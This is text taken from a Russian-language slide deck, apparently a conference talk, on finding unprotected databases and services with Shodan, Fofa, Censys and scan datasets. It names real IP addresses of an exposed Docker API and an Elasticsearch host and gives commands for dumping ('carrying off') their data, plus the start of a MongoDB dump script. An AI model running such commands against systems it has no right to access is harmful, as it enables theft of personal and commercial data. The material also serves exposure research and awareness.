Академический Документы
Профессиональный Документы
Культура Документы
незащищенных
ресурсов, баз данных.
Андрей Схоменко
andrew.foma@protonmail.com
Telegram: @AndrewFoma
О чем доклад(тезисами)
Откуда проблема с незащищенными ресурсами:
Почему важно:
1. Репутационный и финансовый ущерб собственнику;
2. Персональные данные пользователей;
3. Коммерческая и иная, охраняемая законом информация;
4. Компрометация ресурса.
Незащищенные ресурсы:
Специализированные сервисы:
1. Shodan.io
2. Censys.io
3. Binaryedge.io
4. Zoomeye.org
5. Fofa.so
6. Lampyre.io
Самостоятельно:
1. Zmap - zmap.io
2. masscan
3. что-нибудь своё
Инструменты, источники данных (примеры):
Shodan: product:mongodb all:"metrics" country:us
https://snippets.shodan.io/tag/shodan
Инструменты, источники данных (примеры):
Fofa: protocol==mongodb
Инструменты, источники данных (примеры):
Запрос в
Lampyre.io на
сертификат и
домены
Screenshot
страницы ресурса
Мобильное приложение,
автор: Dmitryi Titiev
Дисклеймер, минутка офтопа. OSINT - найти автора
UDP Scans
TCP Scans
Инструменты, источники данных (Project Sonar Rapid7):
TCP Scans
2019-04-03-1554275005-http_get_9200.csv.gz 52.8 MB April 3, 2019
lines: 4 416 769
['timestamp_ts', 'saddr', 'sport', 'daddr', 'dport', 'ipid', 'ttl']
['1554275014', '35.241.0.80', '9200', '71.6.233.53', '9200', '13004', '122']
['1554275014', '35.212.184.47', '9200', '71.6.233.40', '9200', '54590', '122']
['1554275014', '170.104.152.164', '9200', '71.6.233.7', '9200', '27906', '242']
['1554275014', '132.190.101.218', '9200', '71.6.233.65', '9200', '3868', '243']
['1554275014', '216.169.132.13', '9200', '71.6.233.106', '9200', '0', '53']
['1554275014', '103.198.190.122', '9200', '71.6.233.109', '9200', '54321', '248’]
……………….
DB:Elasticsearch
Explore
Инструменты, источники данных (Project Sonar Rapid7):
– 323 млн.
Elasticsearch
Незащищенные сервисы и базы: Cassandra, ClickHouse,
Elasticsearch
– 323 млн.
Elasticsearch
Незащищенные сервисы и базы: Cassandra, ClickHouse,
Elasticsearch
Незащищенные сервисы и базы: Cassandra, ClickHouse,
Elasticsearch
Незащищенные сервисы и базы: Cassandra, ClickHouse,
Elasticsearch
Незащищенные сервисы и базы: Docker API, NFS, Etc
http://47.98.167.96:2375/containers/json
или
1. docker -H 47.98.167.96:2375 ps –a
b46afc9bfc81 mysql
"docker-entrypoint..." 6 weeks ago Up 3 hours
0.0.0.0:3306->3306/tcp, 33060/tcp mysql
2. http://47.98.167.96:2375/containers/b46afc9bfc81/json
Как «уносить» …
Elasticsearch
1. github.com/taskrabbit/elasticsearch-dump
Docker image: docker pull taskrabbit/elasticsearch-dump
docker run --rm -ti -v /dump:/tmp taskrabbit/elasticsearch-dump --
input=http://130.245.169.64:80/ip-resolution --output=/tmp/ip-resolution.json --
type=data --fileSize=2mb
И итерация по results
Как «уносить» …
MongoDB
1.
#!/bin/bash
mongohost=$1
dump_path=$2
mongo_version=`mongo --eval "db.version()" $mongohost | tail -1`
echo $mongo_version
version_regexp="^[0-9]\.[0-9]\.[0-9]+$"